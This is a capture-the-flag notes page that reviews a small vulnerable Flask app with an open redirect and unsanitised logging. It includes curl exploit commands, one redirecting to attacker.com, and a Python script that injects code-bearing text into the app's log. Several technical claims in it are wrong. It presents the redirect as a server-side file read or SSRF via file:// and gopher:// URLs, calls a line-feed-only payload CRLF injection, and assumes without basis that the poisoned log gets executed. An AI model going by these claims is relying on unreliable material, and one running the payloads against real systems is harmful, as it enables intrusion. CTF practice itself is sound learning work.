Extra Notes

Challenge 1

Day 0 - 24/4/2025.

#!/usr/bin/env python3
#app.py
from flask import Flask, request, redirect, url_for
import logging

app = Flask(__name__)

logging.basicConfig(level=logging.INFO)

def is_authenticated_user():
    # This function checks if the user is authenticated and is omitted for brevity
   pass

@app.route('/')
def home():
    if not is_authenticated_user():
        logging.info('Unauthorized access attempt.')
        return redirect(url_for('login'))

    redirect_url = request.args.get('redirect_url')
    if redirect_url:
        logging.info(f'Redirecting to: {redirect_url}')
        return redirect(redirect_url)

    return 'Welcome to the home page!'

@app.route('/login')
def login():
    # Simulated login page
    return 'Login Page - User authentication goes here.'

if __name__ == '__main__':
    app.run(debug=False)

Vulnerability Analysis

  1. Open Redirect Vulnerability

  2. Log Poisoning Vulnerability

Open Redirect Vulnerability

The application accepts redirect_url parameter and redirect the user without proper validation. This allows attackers to redirect users to malicious websites. 

curl http://challenge.ctf.example:5000?redirect_url=http://attacker.com/
curl "http://challenge-url:5000/?redirect_url=file:///flag.txt"

SSRF
curl "http://challenge-url:5000/?redirect_url=gopher:///flag.txt"

Log Poisoning Vulnerability

User input from redirect_url is directly logged without sanitization. This could allow injection of malicious data into log files

#!/usr/bin/env python3
import requests
import urllib.parse

# Target application URL
TARGET_URL = "http://localhost:5000"

# Log poisoning payload to create a log entry with CRLF injection
log_payload = "mywebsite.com\n\"\nimport os\nwith open('/flag.txt', 'r') as f:\n    print('FLAG: ' + f.read())\n\"\n"

# URL encode the payload
encoded_payload = urllib.parse.quote_plus(log_payload)

exploit_url = f"{TARGET_URL}/?redirect_url={encoded_payload}"

print("[+] Exploitation .....")
response = requests.get(exploit_url)
print(f"[+] Response status: {response.status_code}")
print("[+] Log should now be poisoned with code that will read flag.txt when processed")

Sample CTF Environment

PreviousSource Code ReviewNextCTF File

Last updated